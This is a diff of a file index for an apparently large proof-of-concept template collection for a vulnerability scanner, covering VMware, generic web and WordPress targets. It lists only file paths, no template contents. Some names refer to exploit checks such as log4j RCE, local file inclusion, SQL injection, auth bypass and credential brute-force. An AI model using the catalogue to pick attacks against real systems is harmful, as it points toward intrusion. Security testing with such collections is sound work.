./poc/upload/unauthenticated-popup-upload-10920.yaml -./poc/upload/unauthenticated-popup-upload-10922.yaml +./poc/upload/unauthenticated-popup-upload-10921.yaml ./poc/upload/unauthenticated-popup-upload-10923.yaml +./poc/upload/unauthenticated-popup-upload.yaml ./poc/upload/upload-file-type-settings-plugin-34a83d20c52593027e0331b726395a3e.yaml ./poc/upload/upload-file-type-settings-plugin.yaml ./poc/upload/upload-media-by-url-76789b55ff551b3b92d96d845bdeb7a3.yaml 
@@ -96091,9 +96091,10 @@ ./poc/vmware/vmware-hcx-login.yaml ./poc/vmware/vmware-horizon-11038.yaml ./poc/vmware/vmware-horizon-11039.yaml -./poc/vmware/vmware-horizon-11041.yaml +./poc/vmware/vmware-horizon-11040.yaml ./poc/vmware/vmware-horizon-daas.yaml ./poc/vmware/vmware-horizon-log4j-jndi-rce-11034.yaml +./poc/vmware/vmware-horizon-log4j-jndi-rce.yaml ./poc/vmware/vmware-horizon-log4j-rce.yaml ./poc/vmware/vmware-horizon-panel-11035.yaml ./poc/vmware/vmware-horizon-panel-11037.yaml @@ -96107,13 +96108,13 @@ ./poc/vmware/vmware-vcenter-cve-2021-21985-rce.yml ./poc/vmware/vmware-vcenter-lfi-1.yaml ./poc/vmware/vmware-vcenter-lfi-11046.yaml -./poc/vmware/vmware-vcenter-lfi-11047.yaml ./poc/vmware/vmware-vcenter-lfi-11048.yaml ./poc/vmware/vmware-vcenter-lfi-2.yaml ./poc/vmware/vmware-vcenter-lfi-3.yaml ./poc/vmware/vmware-vcenter-lfi-linux-11042.yaml ./poc/vmware/vmware-vcenter-lfi-linux-11043.yaml ./poc/vmware/vmware-vcenter-lfi-linux-11045.yaml +./poc/vmware/vmware-vcenter-lfi.yaml ./poc/vmware/vmware-vcenter-log4j-jndi-rce-11050.yaml ./poc/vmware/vmware-vcenter-ssrf-11051.yaml ./poc/vmware/vmware-vcenter-ssrf-11052.yaml @@ -96127,12 +96128,13 @@ ./poc/vmware/vmware-virtualcenter.yaml ./poc/vmware/vmware-vrealize-cve-2021-21975-ssrf.yml ./poc/vmware/vmware-vrealize-detect-11056.yaml -./poc/vmware/vmware-vrealize-detect-11057.yaml ./poc/vmware/vmware-vrealize-detect-11058.yaml +./poc/vmware/vmware-vrealize-detect.yaml ./poc/vmware/vmware-vrealize-operations-manager.yaml ./poc/vmware/vmware-vrealize.yaml ./poc/vmware/vmware-vsphere.yaml -./poc/vmware/vmware-workflow-11059.yaml +./poc/vmware/vmware-workflow-11060.yaml +./poc/vmware/vmware-workflow.yaml ./poc/vmware/vmware-workspace-one-log4j-rce.yaml ./poc/vmware/vmwareview.yaml ./poc/web/360-webscan.yaml 
@@ -96190,7 +96192,6 @@ ./poc/web/allwebmenus-wordpress-menu-plugin.yaml ./poc/web/alphaweb-default-login-276.yaml ./poc/web/alphaweb-default-login-277.yaml -./poc/web/alphaweb-default-login.yaml ./poc/web/am-websystem.yaml ./poc/web/amazon-web-services-phish.yaml ./poc/web/apache-oozie-web-console.yaml @@ -96198,10 +96199,9 @@ ./poc/web/appsmith-web-login.yaml ./poc/web/arangodb-web-Interface.yaml ./poc/web/archibus-webcentral-panel.yaml -./poc/web/artica-web-proxy-detect-543.yaml ./poc/web/artica-web-proxy-detect-544.yaml -./poc/web/artica-web-proxy-detect-545.yaml ./poc/web/artica-web-proxy-detect-546.yaml +./poc/web/artica-web-proxy-detect.yaml ./poc/web/artica-web-proxy-workflow.yaml ./poc/web/automatedlogiccorporation-webctrl.yaml ./poc/web/avtech-video-web-server.yaml @@ -96210,22 +96210,22 @@ ./poc/web/aweber-web-form-widget.yaml ./poc/web/axel-webserver.yaml ./poc/web/axigen-webadmin-659.yaml -./poc/web/axigen-webadmin-660.yaml ./poc/web/axigen-webadmin-661.yaml ./poc/web/axigen-webmail-663.yaml ./poc/web/axigen-webmail-664.yaml -./poc/web/axigen-webmail.yaml ./poc/web/axis2-web.yaml ./poc/web/axway-securetransport-webclient.yaml -./poc/web/azkaban-web-client-676.yaml ./poc/web/azkaban-web-client-677.yaml ./poc/web/azkaban-web-client-678.yaml ./poc/web/azkaban-web-client-679.yaml +./poc/web/azkaban-web-client-680.yaml ./poc/web/azkaban-web-client-default-creds.yaml ./poc/web/azure-website-enum.yaml ./poc/web/bizcalendar-web-bbb880210d42a6df93041f7b5a68a42e.yaml ./poc/web/bizcalendar-web.yaml +./poc/web/boa-web-fileread-11846.yaml ./poc/web/boa-web-fileread.yaml +./poc/web/boa-web-server.yaml ./poc/web/carel-pcoweb-hvac-bacnet-gateway-directory-traversal.yaml ./poc/web/catch-web-tools-7e509c5743e470c1816b86d61338d841.yaml ./poc/web/catch-web-tools-8ca1ca4a446ea27e1e50c6dcc62fa72b.yaml 
@@ -96246,11 +96246,11 @@ ./poc/web/cleanweb-panel.yaml ./poc/web/cloud-enum-azure-website.yaml ./poc/web/cobbler-webgui-1122.yaml -./poc/web/cobbler-webgui-1124.yaml +./poc/web/cobbler-webgui-1123.yaml ./poc/web/cobbler-webgui.yaml +./poc/web/codemeter-webadmin-panel-1135.yaml ./poc/web/codemeter-webadmin-panel-1136.yaml ./poc/web/codemeter-webadmin-panel-1137.yaml -./poc/web/codemeter-webadmin-panel-1138.yaml ./poc/web/codemeter-webadmin-panel.yaml ./poc/web/codemeter-webadmin.yaml ./poc/web/codesys-webvisu.yaml @@ -96327,8 +96327,8 @@ ./poc/web/ewebs-arbitrary-file-reading-7273.yaml ./poc/web/ewebs-lfi.yaml ./poc/web/ewebs.yaml +./poc/web/exposed-webalizer-7358.yaml ./poc/web/exposed-webalizer-7359.yaml -./poc/web/exposed-webalizer-7360.yaml ./poc/web/exposed-webalizer.yaml ./poc/web/facebook-by-weblizar-5f0cf300a16245f7f5c3b4c848d038d5.yaml ./poc/web/facebook-by-weblizar.yaml @@ -96396,6 +96396,7 @@ ./poc/web/h3c-web应用防火墙.yaml ./poc/web/h3c-web网管.yaml ./poc/web/hanweb-system.yaml +./poc/web/hashicorp-consul-webgui-7896.yaml ./poc/web/hashicorp-consul-webgui-7897.yaml ./poc/web/hashicorp-consul-webgui-7898.yaml ./poc/web/hashicorp-consul-webgui.yaml @@ -96406,7 +96407,6 @@ ./poc/web/homeworks-illumination-web-keypad.yaml ./poc/web/honeywell-web-controller-7994.yaml ./poc/web/honeywell-web-controller-7995.yaml -./poc/web/honeywell-web-controller-7996.yaml ./poc/web/honeywell-web-controller.yaml ./poc/web/honeywell-xl-web-controller.yaml ./poc/web/horde-webmail-login.yaml @@ -96449,10 +96449,9 @@ ./poc/web/icewarp-webclient-rce-8130.yaml ./poc/web/icewarp-webclient-rce-8131.yaml ./poc/web/icewarp-webclient-rce-8132.yaml -./poc/web/icewarp-webclient-rce-8133.yaml +./poc/web/icinga-web-login-8134.yaml ./poc/web/icinga-web-login-8135.yaml ./poc/web/icinga-web-login-8136.yaml -./poc/web/icinga-web-login-8137.yaml ./poc/web/icinga-web-login.yaml ./poc/web/ideawebserver.yaml ./poc/web/igenus-webmail.yaml 
@@ -96469,7 +96468,7 @@ ./poc/web/indigitall-web-push-notifications.yaml ./poc/web/ip-guard-webserver-rce.yaml ./poc/web/iplanet-web-server-8189.yaml -./poc/web/iplanet-web-server-8190.yaml +./poc/web/iplanet-web-server-8191.yaml ./poc/web/iplanet-web-server.yaml ./poc/web/iwebshop.yaml ./poc/web/iwebsns.yaml @@ -96484,7 +96483,7 @@ ./poc/web/keenetic-web-login-8439.yaml ./poc/web/keenetic-web-login-8440.yaml ./poc/web/keenetic-web-login-8441.yaml -./poc/web/keenetic-web-login-8443.yaml +./poc/web/keenetic-web-login-8442.yaml ./poc/web/keenetic-web-login.yaml ./poc/web/keil-embedded-web-server.yaml ./poc/web/kerio-webstar.yaml @@ -96567,8 +96566,8 @@ ./poc/web/openwebui-panel.yaml ./poc/web/opt-webfieldassis.yaml ./poc/web/oracle-iplanet-web-server-9391.yaml +./poc/web/oracle-iplanet-web-server-9392.yaml ./poc/web/oracle-iplanet-web-server-9393.yaml -./poc/web/oracle-iplanet-web-server.yaml ./poc/web/oracle-webdb.yaml ./poc/web/oracle-weblogic.yaml ./poc/web/original-texts-yandex-webmaster-2e0593c9307af66de377149e0e6a4d6c.yaml @@ -96616,11 +96615,11 @@ ./poc/web/ruijie_EWEB_route_auth_rce.yaml ./poc/web/saia-web-server-info-9978.yaml ./poc/web/saia-web-server-info-9979.yaml +./poc/web/saia-web-server-info.yaml ./poc/web/samphpweb.yaml ./poc/web/sap-netweaver-webgui-10056.yaml ./poc/web/sap-netweaver-webgui-10057.yaml ./poc/web/sap-netweaver-webgui-10059.yaml -./poc/web/sap-netweaver-webgui.yaml ./poc/web/sap-nw-abap-webgui.yaml ./poc/web/sap-web-application-server.yaml ./poc/web/sap-web-dispatcher-10074.yaml @@ -96629,6 +96628,7 @@ ./poc/web/sap-web-dispatcher-10078.yaml ./poc/web/sap-web-dispatcher-admin-portal-10069.yaml ./poc/web/sap-web-dispatcher-admin-portal-10070.yaml +./poc/web/sap-web-dispatcher-admin-portal-10071.yaml ./poc/web/sap-web-dispatcher-admin-portal-10072.yaml ./poc/web/sap-web-dispatcher-admin-portal-10073.yaml ./poc/web/sap-web-dispatcher-admin-portal.yaml 
@@ -96652,7 +96652,7 @@ ./poc/web/simple-custom-website-data-plugin.yaml ./poc/web/simple-custom-website-data.yaml ./poc/web/simsweb.yaml -./poc/web/slack-webhook-11865.yaml +./poc/web/slack-webhook(1).yaml ./poc/web/slack-webhook-token-10315.yaml ./poc/web/slack-webhook.yaml ./poc/web/sma-sunny_webbox.yaml @@ -96661,6 +96661,7 @@ ./poc/web/sophos-utm-web-protection.yaml ./poc/web/sophos-web-appliance.yaml ./poc/web/spark-webui-unauth-10400.yaml +./poc/web/spark-webui-unauth-10401.yaml ./poc/web/spark-webui-unauth-10402.yaml ./poc/web/spark-webui-unauth.yaml ./poc/web/spark-webui-unauth.yml @@ -96746,7 +96747,6 @@ ./poc/web/web-cache-poisoning.yaml ./poc/web/web-config-11123.yaml ./poc/web/web-config-11124.yaml -./poc/web/web-config-11125.yaml ./poc/web/web-config-11126.yaml ./poc/web/web-config-11127.yaml ./poc/web/web-config.yaml @@ -96774,7 +96774,6 @@ ./poc/web/web-file-manager.yaml ./poc/web/web-framework-detect.yaml ./poc/web/web-ftp-detect-11135.yaml -./poc/web/web-ftp-detect-11136.yaml ./poc/web/web-ftp-detect-11137.yaml ./poc/web/web-ftp-detect-11138.yaml ./poc/web/web-instant-messenger-4ae688b6df13f1343923a0c3f1daa933.yaml @@ -96786,8 +96785,8 @@ ./poc/web/web-invoice-568a28d02436de053e0789f1133f8a51.yaml ./poc/web/web-invoice-639321e1bd4c22ce8fd4e6ce306ce3fd.yaml ./poc/web/web-invoice.yaml +./poc/web/web-local-craft-11139.yaml ./poc/web/web-local-craft-11140.yaml -./poc/web/web-local-craft-11141.yaml ./poc/web/web-local-craft.yaml ./poc/web/web-minimalist-200901-c22f0a0c3966959ccbbc8e0bebf65053.yaml ./poc/web/web-minimalist-200901.yaml @@ -96800,7 +96799,7 @@ ./poc/web/web-stories-fc9200f38f324ac4675bb76c80fa16f7.yaml ./poc/web/web-stories.yaml ./poc/web/web-suite-detect-11167.yaml -./poc/web/web-suite-detect.yaml +./poc/web/web-suite-detect-11168.yaml ./poc/web/web-viewer-panel.yaml ./poc/web/web-wiz-rich-text-editor.yaml ./poc/web/web-xml-finder(1).yaml 
@@ -96843,11 +96842,10 @@ ./poc/web/webcam-2way-videochat-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/web/webcam-2way-videochat-plugin.yaml ./poc/web/webcam-2way-videochat.yaml -./poc/web/webcamxp-5-11122.yaml +./poc/web/webcamxp-5.yaml ./poc/web/webcomco-panel.yaml ./poc/web/webeditors-1.yaml ./poc/web/webeditors-11128.yaml -./poc/web/webeditors-11129.yaml ./poc/web/webeditors-11130.yaml ./poc/web/webeditors-2.yaml ./poc/web/webeditors-3.yaml @@ -96869,8 +96867,8 @@ ./poc/web/weberino-timed-quiz-creator.yaml ./poc/web/webflow-pages-1ea2b2d3f70cdc2bbd228fad03d8cc84.yaml ./poc/web/webflow-pages.yaml -./poc/web/webflow-takeover-11131.yaml ./poc/web/webflow-takeover-11132.yaml +./poc/web/webflow-takeover-11133.yaml ./poc/web/webflow-takeover-11134.yaml ./poc/web/webflow-takeover.yaml ./poc/web/webfolio-31eb77eaefc61e112478e9f1952e822d.yaml @@ -96933,11 +96931,10 @@ ./poc/web/weblogic-ssrf.yaml ./poc/web/weblogic-ssrf.yml ./poc/web/weblogic-t3-detect-11151.yaml -./poc/web/weblogic-t3-detect-11152.yaml +./poc/web/weblogic-t3-detect-11153.yaml ./poc/web/weblogic-t3-detect.yaml ./poc/web/weblogic-t3-search.yaml ./poc/web/weblogic-uddiexplorer.yaml -./poc/web/weblogic-weak-login-11154.yaml ./poc/web/weblogic-weak-login-11155.yaml ./poc/web/weblogic-weak-login-11156.yaml ./poc/web/weblogic-workflow-11157.yaml @@ -96964,9 +96961,9 @@ ./poc/web/webmin-panel.yaml ./poc/web/webmin-workflow.yaml ./poc/web/webmin.yaml +./poc/web/webmodule-ee-11162.yaml ./poc/web/webmodule-ee-11163.yaml -./poc/web/webmodule-ee-11164.yaml -./poc/web/webmodule-ee-panel-11160.yaml +./poc/web/webmodule-ee-panel-11161.yaml ./poc/web/webmodule-ee-panel.yaml ./poc/web/webmodule-ee.yaml ./poc/web/webp-converter-for-media-a33c88596c6b666a69762f624cf7c81b.yaml 
@@ -97022,21 +97019,21 @@ ./poc/web/webtransfer-client-panel.yaml ./poc/web/webtrees-install.yaml ./poc/web/webtrust-cert.yaml -./poc/web/webui-rce-11170.yaml ./poc/web/webui-rce-11171.yaml ./poc/web/webui-rce-11172.yaml ./poc/web/webui-rce-11173.yaml +./poc/web/webui-rce-11174.yaml ./poc/web/webui-rce.yaml ./poc/web/webuploader.yaml ./poc/web/webuzo-admin-panel.yaml ./poc/web/webuzo-installer.yaml ./poc/web/webview-addjavascript-interface-11175.yaml -./poc/web/webview-addjavascript-interface-11177.yaml +./poc/web/webview-addjavascript-interface-11176.yaml ./poc/web/webview-addjavascript-interface.yaml ./poc/web/webview-javascript-11178.yaml ./poc/web/webview-javascript.yaml +./poc/web/webview-load-url-11180.yaml ./poc/web/webview-load-url-11181.yaml -./poc/web/webview-load-url-11182.yaml ./poc/web/webview-load-url.yaml ./poc/web/webview-universal-access-11183.yaml ./poc/web/webview-universal-access-11185.yaml @@ -97068,7 +97065,6 @@ ./poc/web/xp-webcam-11696.yaml ./poc/web/xp-webcam-11697.yaml ./poc/web/xp-webcam-11699.yaml -./poc/web/xp-webcam.yaml ./poc/web/xweb500-panel.yaml ./poc/web/yonyou-nc-ncfindweb-directory-traversal.yaml ./poc/web/yonyou-u9-umwebservice-fileread.yaml @@ -97267,7 +97263,6 @@ ./poc/wordpress/alfacgiapi-wordpress-257.yaml ./poc/wordpress/alfacgiapi-wordpress-3.yaml ./poc/wordpress/alfacgiapi-wordpress-4.yaml -./poc/wordpress/alfacgiapi-wordpress.yaml ./poc/wordpress/all-in-one-wp-migration-08b487f085e8087c59e905026c1c075f.yaml ./poc/wordpress/all-in-one-wp-migration-1650269cab833c79cc04147ad34dbaad.yaml ./poc/wordpress/all-in-one-wp-migration-23b0a34f39e5c93f169108f329b1e3c9.yaml 
@@ -97690,7 +97685,7 @@ ./poc/wordpress/easy-wp-smtp-e105c23e6058137711e2a12fec6f051e.yaml ./poc/wordpress/easy-wp-smtp-listing-7154.yaml ./poc/wordpress/easy-wp-smtp-listing-7155.yaml -./poc/wordpress/easy-wp-smtp-listing-7157.yaml +./poc/wordpress/easy-wp-smtp-listing-7156.yaml ./poc/wordpress/easy-wp-smtp-listing.yaml ./poc/wordpress/easy-wp-smtp.yaml ./poc/wordpress/easyrotator-for-wordpress-0184078b79ad95363b9f16489d7e6821.yaml @@ -97758,6 +97753,7 @@ ./poc/wordpress/feedwordpress-db142dc7dc2479e241016bfec90b9659.yaml ./poc/wordpress/feedwordpress-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/feedwordpress-plugin.yaml +./poc/wordpress/feedwordpress-xss-7459.yaml ./poc/wordpress/feedwordpress-xss-7460.yaml ./poc/wordpress/feedwordpress-xss.yaml ./poc/wordpress/feedwordpress.yaml @@ -98366,7 +98362,6 @@ ./poc/wordpress/n-media-wp-simple-quiz.yaml ./poc/wordpress/nativechurch-wp-theme-lfd-8999.yaml ./poc/wordpress/nativechurch-wp-theme-lfd-9000.yaml -./poc/wordpress/nativechurch-wp-theme-lfd-9001.yaml ./poc/wordpress/nativechurch-wp-theme-lfd-9002.yaml ./poc/wordpress/nativechurch-wp-theme-lfd-9003.yaml ./poc/wordpress/nex-forms-express-wp-form-builder-03800489aeb5ec718d025ca048ebef5f.yaml @@ -98714,7 +98709,6 @@ ./poc/wordpress/transposh-translation-filter-for-wordpress.yaml ./poc/wordpress/triberr-wordpress-plugin-a366a26580883f88c953f87f94a969cb.yaml ./poc/wordpress/triberr-wordpress-plugin.yaml -./poc/wordpress/trilithic-viewpoint-default-10835.yaml ./poc/wordpress/trilithic-viewpoint-default-10836.yaml ./poc/wordpress/trilithic-viewpoint-default-password.yaml ./poc/wordpress/trilithic-viewpoint-default.yaml 
@@ -98761,7 +98755,6 @@ ./poc/wordpress/viewpoint-system-status-11016.yaml ./poc/wordpress/viewpoint-system-status-11017.yaml ./poc/wordpress/viewpoint-system-status-11018.yaml -./poc/wordpress/viewpoint-system-status-11019.yaml ./poc/wordpress/viewpoint-system-status.yaml ./poc/wordpress/views-for-wpforms-lite-3242a9557ef1bd82e6212d9b01c1527e.yaml ./poc/wordpress/views-for-wpforms-lite-9616fb3bedf6e4ae461ce40dedf17ff9.yaml @@ -99041,7 +99034,6 @@ ./poc/wordpress/wordpress-accessible-wpconfig-10.yaml ./poc/wordpress/wordpress-accessible-wpconfig-11.yaml ./poc/wordpress/wordpress-accessible-wpconfig-11234.yaml -./poc/wordpress/wordpress-accessible-wpconfig-11235.yaml ./poc/wordpress/wordpress-accessible-wpconfig-11237.yaml ./poc/wordpress/wordpress-accessible-wpconfig-11238.yaml ./poc/wordpress/wordpress-accessible-wpconfig-11239.yaml @@ -99072,8 +99064,8 @@ ./poc/wordpress/wordpress-ae44f6a1ec4312db054e74e48af20717.yaml ./poc/wordpress/wordpress-af2937e1967165caa42cd4ad64300421.yaml ./poc/wordpress/wordpress-afad16faf36b64e536b10247898859bf.yaml -./poc/wordpress/wordpress-affiliatewp-log-11240.yaml ./poc/wordpress/wordpress-affiliatewp-log-11241.yaml +./poc/wordpress/wordpress-affiliatewp-log-11242.yaml ./poc/wordpress/wordpress-affiliatewp-log-11243.yaml ./poc/wordpress/wordpress-affiliatewp-log-11244.yaml ./poc/wordpress/wordpress-affiliatewp-log.yaml @@ -99108,6 +99100,7 @@ ./poc/wordpress/wordpress-bbe7d5752179155e1a73c493a9edc901.yaml ./poc/wordpress/wordpress-bbpress-plugin-listing-11245.yaml ./poc/wordpress/wordpress-bbpress-plugin-listing-11246.yaml +./poc/wordpress/wordpress-bbpress-plugin-listing.yaml ./poc/wordpress/wordpress-bc11188030c5ef34e44564c173b85b3b.yaml ./poc/wordpress/wordpress-bcae5ef6c0a4aa3c431c36626afbf967.yaml ./poc/wordpress/wordpress-bcee80614ad35036078b4b38fac65ba7.yaml 
@@ -99191,6 +99184,7 @@ ./poc/wordpress/wordpress-db-backup-listing-11250.yaml ./poc/wordpress/wordpress-db-backup-listing.yaml ./poc/wordpress/wordpress-db-backup.yaml +./poc/wordpress/wordpress-db-repair-11252.yaml ./poc/wordpress/wordpress-db-repair-11253.yaml ./poc/wordpress/wordpress-db-repair-11254.yaml ./poc/wordpress/wordpress-db-repair-11255.yaml @@ -99202,9 +99196,9 @@ ./poc/wordpress/wordpress-de03b87f4ceb36bcd460178f68d510a8.yaml ./poc/wordpress/wordpress-debug-log-11256.yaml ./poc/wordpress/wordpress-debug-log-11257.yaml -./poc/wordpress/wordpress-debug-log-11258.yaml +./poc/wordpress/wordpress-debug-log-11259.yaml ./poc/wordpress/wordpress-debug-log.yaml -./poc/wordpress/wordpress-detect-11261.yaml +./poc/wordpress/wordpress-detect-11260.yaml ./poc/wordpress/wordpress-detect.yaml ./poc/wordpress/wordpress-detect2.yaml ./poc/wordpress/wordpress-directory-listing-1.yaml @@ -99257,9 +99251,9 @@ ./poc/wordpress/wordpress-emails-verification-for-woocommerce-11271.yaml ./poc/wordpress/wordpress-emails-verification-for-woocommerce-2.yaml ./poc/wordpress/wordpress-emails-verification-for-woocommerce.yaml -./poc/wordpress/wordpress-emergency-script-11272.yaml ./poc/wordpress/wordpress-emergency-script-11273.yaml ./poc/wordpress/wordpress-emergency-script-11274.yaml +./poc/wordpress/wordpress-emergency-script-11275.yaml ./poc/wordpress/wordpress-emergency-script-11276.yaml ./poc/wordpress/wordpress-emergency-script-11277.yaml ./poc/wordpress/wordpress-emergency-script.yaml 
@@ -99326,15 +99320,12 @@ ./poc/wordpress/wordpress-gdpr-7c5c53c8eaf2ec27b04a769490da718e.yaml ./poc/wordpress/wordpress-gdpr.yaml ./poc/wordpress/wordpress-git-config-1.yaml -./poc/wordpress/wordpress-git-config-11278.yaml ./poc/wordpress/wordpress-git-config-11279.yaml ./poc/wordpress/wordpress-git-config-2.yaml -./poc/wordpress/wordpress-gotmls-detect-11280.yaml ./poc/wordpress/wordpress-gotmls-detect-11281.yaml ./poc/wordpress/wordpress-gotmls-detect.yaml +./poc/wordpress/wordpress-gtranslate-plugin-listing-11282.yaml ./poc/wordpress/wordpress-gtranslate-plugin-listing-11283.yaml -./poc/wordpress/wordpress-gtranslate-plugin-listing-11284.yaml -./poc/wordpress/wordpress-gtranslate-plugin-listing.yaml ./poc/wordpress/wordpress-https-4a61ef799fd66b2a49253a5892d07d5e.yaml ./poc/wordpress/wordpress-https-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wordpress-https-fc212cc7eec653319494b488cc7fe53d.yaml @@ -99345,19 +99336,17 @@ ./poc/wordpress/wordpress-infinitewp-auth-bypass-11285.yaml ./poc/wordpress/wordpress-infinitewp-auth-bypass-11286.yaml ./poc/wordpress/wordpress-infinitewp-auth-bypass-11287.yaml -./poc/wordpress/wordpress-infinitewp-auth-bypass-11288.yaml ./poc/wordpress/wordpress-infinitewp-auth-bypass-11289.yaml ./poc/wordpress/wordpress-infinitewp-auth-bypass.yaml ./poc/wordpress/wordpress-instagram-feed-c6f7df5b11c5d64e4d637b8f3456595f.yaml ./poc/wordpress/wordpress-instagram-feed.yaml ./poc/wordpress/wordpress-install.yaml -./poc/wordpress/wordpress-installer-log-11290.yaml ./poc/wordpress/wordpress-installer-log-11291.yaml +./poc/wordpress/wordpress-installer-log-11292.yaml ./poc/wordpress/wordpress-installer-log.yaml ./poc/wordpress/wordpress-js.yaml ./poc/wordpress/wordpress-language-7a04dfac5ff879ee9a27e2783540d3cb.yaml ./poc/wordpress/wordpress-language.yaml -./poc/wordpress/wordpress-lfi.yaml ./poc/wordpress/wordpress-login-11293.yaml ./poc/wordpress/wordpress-login-11294.yaml ./poc/wordpress/wordpress-login.yaml 
@@ -99421,9 +99410,8 @@ ./poc/wordpress/wordpress-rdf-user-enum-11305.yaml ./poc/wordpress/wordpress-rdf-user-enum.yaml ./poc/wordpress/wordpress-readme-file.yaml -./poc/wordpress/wordpress-redirection-plugin-listing-11306.yaml ./poc/wordpress/wordpress-redirection-plugin-listing-11307.yaml -./poc/wordpress/wordpress-redirection-plugin-listing.yaml +./poc/wordpress/wordpress-redirection-plugin-listing-11308.yaml ./poc/wordpress/wordpress-registration-enabled.yaml ./poc/wordpress/wordpress-rest-api.yaml ./poc/wordpress/wordpress-sensitive-config.yaml @@ -99495,11 +99483,12 @@ ./poc/wordpress/wordpress-tabs-slides.yaml ./poc/wordpress/wordpress-takeover-11310.yaml ./poc/wordpress/wordpress-takeover-11311.yaml -./poc/wordpress/wordpress-takeover-11313.yaml +./poc/wordpress/wordpress-takeover-11312.yaml ./poc/wordpress/wordpress-takeover-11314.yaml ./poc/wordpress/wordpress-takeover.yaml ./poc/wordpress/wordpress-theme-travelscape-1-0-3-arbitrary-file-upload.yaml ./poc/wordpress/wordpress-themes-detect-11315.yaml +./poc/wordpress/wordpress-themes-detect-11316.yaml ./poc/wordpress/wordpress-themes-detect.yaml ./poc/wordpress/wordpress-themes2.yaml ./poc/wordpress/wordpress-tmm-db-migrate-11318.yaml @@ -99512,8 +99501,8 @@ ./poc/wordpress/wordpress-tooltips-bb1c0eb45ddcceab250cf6c792889f44.yaml ./poc/wordpress/wordpress-tooltips-fa55ee3725a206bca8373dd20c9f75b0.yaml ./poc/wordpress/wordpress-tooltips.yaml -./poc/wordpress/wordpress-total-upkeep-backup-download-11322.yaml ./poc/wordpress/wordpress-total-upkeep-backup-download-11323.yaml +./poc/wordpress/wordpress-total-upkeep-backup-download-11324.yaml ./poc/wordpress/wordpress-total-upkeep-backup-download.yaml ./poc/wordpress/wordpress-twitterbot-d36dd4bc6c1a3d5b4f0aafd5b7b723c5.yaml ./poc/wordpress/wordpress-twitterbot.yaml 
@@ -99534,61 +99523,58 @@ ./poc/wordpress/wordpress-users.yaml ./poc/wordpress/wordpress-weak-credentials-11334.yaml ./poc/wordpress/wordpress-weak-credentials-11335.yaml -./poc/wordpress/wordpress-weak-credentials-11337.yaml +./poc/wordpress/wordpress-weak-credentials-11336.yaml ./poc/wordpress/wordpress-weak-credentials.yaml ./poc/wordpress/wordpress-website-detect.yaml ./poc/wordpress/wordpress-whois-search-15d0f2f1bcb62f9575544a5207b1af33.yaml ./poc/wordpress/wordpress-whois-search-1f912223cd5db03abd6e32e02ba54028.yaml ./poc/wordpress/wordpress-whois-search.yaml ./poc/wordpress/wordpress-woocommerce-listing-11338.yaml -./poc/wordpress/wordpress-woocommerce-listing-11339.yaml ./poc/wordpress/wordpress-woocommerce-listing-11340.yaml +./poc/wordpress/wordpress-woocommerce-listing-11341.yaml ./poc/wordpress/wordpress-woocommerce-sqli-1.yaml ./poc/wordpress/wordpress-woocommerce-sqli-11342.yaml ./poc/wordpress/wordpress-woocommerce-sqli-11343.yaml ./poc/wordpress/wordpress-woocommerce-sqli-11344.yaml -./poc/wordpress/wordpress-woocommerce-sqli-11345.yaml ./poc/wordpress/wordpress-woocommerce-sqli-2.yaml ./poc/wordpress/wordpress-woocommerce-sqli.yaml -./poc/wordpress/wordpress-woosidebars.yaml +./poc/wordpress/wordpress-wordfence-lfi-11346.yaml ./poc/wordpress/wordpress-wordfence-lfi-11347.yaml ./poc/wordpress/wordpress-wordfence-lfi-11348.yaml ./poc/wordpress/wordpress-wordfence-lfi-11349.yaml -./poc/wordpress/wordpress-wordfence-lfi-11350.yaml ./poc/wordpress/wordpress-wordfence-lfi-11351.yaml ./poc/wordpress/wordpress-wordfence-lfi-11352.yaml ./poc/wordpress/wordpress-wordfence-waf-bypass-xss-11353.yaml ./poc/wordpress/wordpress-wordfence-waf-bypass-xss-11354.yaml ./poc/wordpress/wordpress-wordfence-waf-bypass-xss-11355.yaml -./poc/wordpress/wordpress-wordfence-waf-bypass-xss-11356.yaml ./poc/wordpress/wordpress-wordfence-xss-11357.yaml ./poc/wordpress/wordpress-wordfence-xss-11358.yaml ./poc/wordpress/wordpress-wordfence-xss-11359.yaml 
./poc/wordpress/wordpress-wordfence-xss-11361.yaml ./poc/wordpress/wordpress-wordfence-xss-11362.yaml ./poc/wordpress/wordpress-wordfence-xss.yaml -./poc/wordpress/wordpress-workflow-11363.yaml ./poc/wordpress/wordpress-workflow-11364.yaml +./poc/wordpress/wordpress-workflow-11365.yaml ./poc/wordpress/wordpress-workflow-11366.yaml ./poc/wordpress/wordpress-workflow.yaml ./poc/wordpress/wordpress-wp-config-exposure.yml ./poc/wordpress/wordpress-wpconfig-inclosure.yaml ./poc/wordpress/wordpress-wpcourses-info-disclosure-11367.yaml ./poc/wordpress/wordpress-wpcourses-info-disclosure-11368.yaml +./poc/wordpress/wordpress-wpcourses-info-disclosure-11369.yaml ./poc/wordpress/wordpress-wpcourses-info-disclosure-11370.yaml -./poc/wordpress/wordpress-wpcourses-info-disclosure-11371.yaml ./poc/wordpress/wordpress-wpcourses-info-disclosure.yaml ./poc/wordpress/wordpress-xmlrpc-brute-force.yaml ./poc/wordpress/wordpress-xmlrpc-bruteforce.yaml ./poc/wordpress/wordpress-xmlrpc-enabled.yaml -./poc/wordpress/wordpress-xmlrpc-listmethods-11372.yaml ./poc/wordpress/wordpress-xmlrpc-listmethods-11373.yaml -./poc/wordpress/wordpress-xmlrpc-listmethods.yaml +./poc/wordpress/wordpress-xmlrpc-listmethods-11374.yaml ./poc/wordpress/wordpress-zebra-form-xss-11375.yaml ./poc/wordpress/wordpress-zebra-form-xss-11376.yaml ./poc/wordpress/wordpress-zebra-form-xss-11377.yaml -./poc/wordpress/wordpress-zebra-form-xss-11378.yaml +./poc/wordpress/wordpress-zebra-form-xss-11379.yaml ./poc/wordpress/wordpress-zebra-form-xss.yaml +./poc/wordpress/wordpress.yaml ./poc/wordpress/wordpressConfig.yaml ./poc/wordpress/wordpress_SSRF_Qards (1).yaml ./poc/wordpress/wordpress_bricks_builder_rce_cve_2024_25600.yaml 
